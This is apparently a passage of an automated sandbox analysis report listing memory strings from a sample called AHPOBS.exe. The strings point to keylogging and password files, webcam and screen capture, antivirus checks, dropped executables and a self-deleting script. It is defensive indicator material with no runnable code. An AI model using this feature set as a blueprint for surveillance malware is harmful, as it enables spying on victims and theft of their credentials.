              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword flags;-,memstr_4486078e-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword length;&,memstr_db0a3b61-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword mingap;#,memstr_d114fe4e-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword chans;memstr_47632dce-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword mode3d;memstr_3b6ed34a-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int singlein;memstr_703bc69a-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword vam;e;memstr_075c27df-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_samplememstr_8027059a-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword inputs;memstr_f99ad6c7-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword formats;memstr_9971cf6d-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float pan;memstr_a58c289c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freq;fxmemstr_4c40c457-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword speakers;memstr_7c33197f-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_3dvectormemstr_4906bc48-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_pluginformmemstr_ab189d23-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword version;memstr_a78d2265-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float z;memstr_9dd1e9a7-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_chorusmemstr_487f5483-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword sample;memstr_c9cdfb6f-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float x;memstr_8e0008a1-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_echomemstr_a374e1d0-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_plugininfomemstr_be4d3f8b-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;ptr;ptr;memstr_77de81f4-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptr filename;memstr_3b85d12d-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword origres;memstr_abbdbd67-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword formatc;memstr_e03f28a8-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float y;ctormemstr_97797bea-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword plugin;memstr_5616e83b-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptr formats;z;\ymemstr_7ce4245f-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_endstmemstr_b9a9e87c-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_err_dll_no_exist}-memstr_39501ece-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_starto-memstr_e8845f20-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_pal_savewf-memstr_c7e4fd7b-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_scalewratea-memstr_4f73a9d9-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_file_savedibax-memstr_7a1de7fc-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gitifcompressionle s-memstr_22b4b3df-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dll_udf_vere-memstr_22d38a48-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_parameq<-memstr_1f0decd1-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_overlayt7-memstr_6e9bbf6c-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_enc_dll_udf_ver.-memstr_544d3a9b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_compressor)-memstr_f9a5289e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.sleep 5000 -memstr_72579388-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _gbbassulonglongfixedmemstr_94dbd82b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variable.deletefile memstr_863fcb9a-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_endmemstr_a3689b67-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_previewctmemstr_c0041439-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_previewratememstr_4ef1b727-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32wmemstr_6ff7876c-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \proxy_client.dllmemstr_697fefc7-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_driver_connectmemstr_d19a8633-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_channelinfomemstr_5be90daf-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_i3dl2reverbmemstr_71d3d8cd-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_err_dll_no_existmemstr_df315585-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_flangermemstr_d8d1d7ee-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_startmemstr_d49dcee3-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_distortionmemstr_33090dc8-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_pal_savewartmemstr_44345085-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spi_setdeskwallpapermemstr_c0e029e1-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatacommondirmemstr_06222b67-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gdip_evtcompressionlzwz8\zmemstr_353a030e-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hophxmemstr_76648a30-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;memstr_4db00bbd-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z)-m.memstr_ff25e8ec-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y)(m/memstr_dd94cab0-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t)+m0memstr_f157d5f3-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s)&m1memstr_41273872-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n)!m2memstr_216dee96-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v)m:memstr_670a3ef5-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j)}m>memstr_c007402b-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i)xm?memstr_13f59091-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;d){m@memstr_fe08a450-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c)vmamemstr_40e1ae54-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)qmbmemstr_bd0df80a-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)lmcmemstr_30f631c4-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8)omdmemstr_590b0428-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7)jmememstr_72ca89d2-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2)emfmemstr_a846ff53-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1)`mgmemstr_a41098a9-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,)cmhmemstr_4ac33b1d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;+)^mimemstr_29eab704-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &)ymjmemstr_750e8c30-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %)tmkmemstr_06b3d7b2-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )wmlmemstr_7d99e145-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;r*%lmemstr_6ee61d5b-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirq* lmemstr_07d4d07d-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;z*memstr_ae66ed5e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;t*memstr_4fb3a7dc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;h*memstr_127d4952-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: basstpwmemstr_c533182d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;;*nlmemstr_7e82fb36-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;6*ilmemstr_ff571137-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;0*glmemstr_5f5f5bba-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startmemstr_ddca01ff-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /passw8.txtz+memstr_6bc23d6f-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /klog.txtw+memstr_95e290ba-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \del.vbsp+memstr_368580e5-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lolrreqqm+memstr_99667900-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirf+memstr_3e00277b-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fftaaertpc+memstr_f09b1c6d-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fft44eteetsdfd\+memstr_603b2b05-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cccveeeeeetsdfdy+memstr_a877594f-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_visibler+memstr_b03eacaf-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /pl2.txto+memstr_2449cdfe-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirh+memstr_2f515faf-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccveertse+memstr_7f0c3bae-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmplayer.exe>+memstr_4624c981-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadir;+memstr_6b12c9e6-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin1.exenk4+memstr_77a4a617-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \etx.exe1+memstr_b3f1eb8d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\mon*+memstr_ecf208c5-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: skypedir'+memstr_c787f7df-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /;xposter.lnk +memstr_fef50b73-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin2.exememstr_73415841-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: firefox.exememstr_1984f5e6-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \pl2.exememstr_6aa21340-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /dst8.txtmemstr_4feb65a1-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \xms8.bin+>mmemstr_1abfe8ae-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\memstr_e74e38e0-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /ransound.wmamemstr_0739c5bd-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccvvbfgfgfgfermemstr_954cb1bc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /uxaxc.exememstr_2c691196-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrome.exememstr_be6ed8b1-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /windata/memstr_7677e9c2-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \sousen.mp3memstr_fd894579-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _versioncomparememstr_060f011a-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_endonmemstr_a7f7deb8-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \baenc.dllmemstr_b5c993ea-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \bass.dllmemstr_d857d0a4-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startrememstr_03738c10-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_reverbmemstr_8c05996b-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ghbassencdllmemstr_63e56646-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ghbassdllmemstr_221a3fa2-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autoitversionmemstr_d0509910-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_childartmemstr_c1f73426-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startrbmemstr_e174a071-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startz>\|memstr_96b337a6-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sousnec4memstr_ac4dbb8f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirl4memstr_aac6fbe3-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: screenmemstr_36bf0b7f-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gerxpmemstr_16e31649-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: screenmemstr_8ba1370f-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oks0rmemstr_f284fe96-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gercx|memstr_65e7634d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: escupxw;plmemstr_fd7cd0fa-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \es.dllk;dlmemstr_31ec99e2-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |f;glmemstr_32743083-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recivtmemstr_7eb8a103-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edit7memstr_df8f191e-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccwa1lmemstr_f07c39fc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffazezszmemstr_f7202c05-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \microsoft\windows\themes\transcodedwallpaper.jpgp:tzmemstr_b79198c2-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword size;dword flags;handle hcursor;p:tzmemstr_f7b53617-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __screencaptureconstant_sm_cxscreenpot;\:tvmemstr_55d3e9a4-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: olorh:tbmemstr_3b1643a6-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bool icon;dword xhotspot;dword yhotspot;handle hmask;handle hcolorp:tzmemstr_99203772-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __screencaptureconstant_sm_cyscreenz>\|memstr_7434177c-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vh*nrmemstr_f6b0e723-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: archxmemstr_f2ee2ab9-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tooormemstr_47e9633f-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: useccmemstr_5357b4d5-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osarchmemstr_e535a859-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tooorgmemstr_e4d6f13f-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _getav#memstr_c4ead25b-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav2memstr_9a730198-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav2^memstr_d63cd960-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win_11memstr_654a10f4-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav-memstr_42629db5-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win_10memstr_4efc4cdb-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1666ssmemstr_80fce11c-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32xmemstr_a7839d52-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vicnamezmemstr_e79836a6-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qlitsmemstr_53f5483a-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vicnamememstr_440ef75c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adminmemstr_a1b0b49d-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: resxomemstr_79d1a8a2-d
